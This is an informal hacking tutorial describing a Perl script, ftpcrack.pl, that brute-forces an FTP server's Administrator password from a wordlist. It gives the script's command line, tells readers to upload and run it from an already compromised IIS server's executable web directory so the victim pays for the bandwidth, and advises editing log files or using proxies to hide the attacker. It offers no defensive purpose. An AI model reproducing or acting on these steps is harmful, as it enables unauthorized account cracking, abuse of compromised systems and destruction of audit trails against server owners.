This is a good one! Ftpcrack.pl will connect to an ftp site and then test the Administrator account with a list of passwords that are read from a text file (cracknt.txt). To be more precise ftpcrack.pl will run the ftp client software using the –n opti on (suppress auto login) and the –s option. The –s option tells the ftp client to run the commands stored in a text file. In this case the command is:

user administrator *password

The line in the perl script, actually the only line in the script, that does this is :

(Copy this line to notepad and save as ftpcrack.pl)

Note the " > cracked.txt" at the end. This redirects the output to a text file cracked.txt. You then open up cracked.txt to see if you have cracked the admin password. This relies on two things:

1. The Administrator has a weak password. One that is listed in the cracknt.txt file.
2. The ftp service isn’t configured to allow only anonymous connections.

The beauty of this one is it can be run remotely : Lets say you have cracked an NT Internet Information Server and have admin rights on it. You can copy this script to that server, using Explorer and put it in the following directory : c:\inetpub\scrip ts or equivalent. It has to go in a www directory that has the ‘execute’ permission enabled. You could also try c:\inetpub\ASPSamp\AdvWorks or if they have it c:\inetpub\cgi-bin. Once you have copied it there you can run it via your web browser. This mean s you are using up their bandwidth and not running up your phone-bill! To run it remotely enter the following URL in your browser :

http://www.company.com/scripts/ftpcrack.pl

After you run it make sure you edit the log file to hide the fact that you were the one who run it. If you don’t do this at least go through a couple of proxy servers. (To find out how to do this read my IP FYI)

Before you upload ftpcrack.pl to the server though edit the IP address in the following line changing it to the IP address of the machine you want to crack.

system (‘ftp –n –s:cracknt.txt 127.0.0.1 > cracked.txt’);

You’ll also need to upload cracknt.txt and put it in the same directory.

Once all that passwords in cracknt.txt have been tested connect to the site using Windows Explorer and open up cracked.txt. Note – You won’t be able to get to this file using the web because the /scripts directory should deny the ‘read’ permission. Onc e you have cracked.txt, using notepad do a search on "logged" because if you get the password you’ll get a message "user administrator logged in."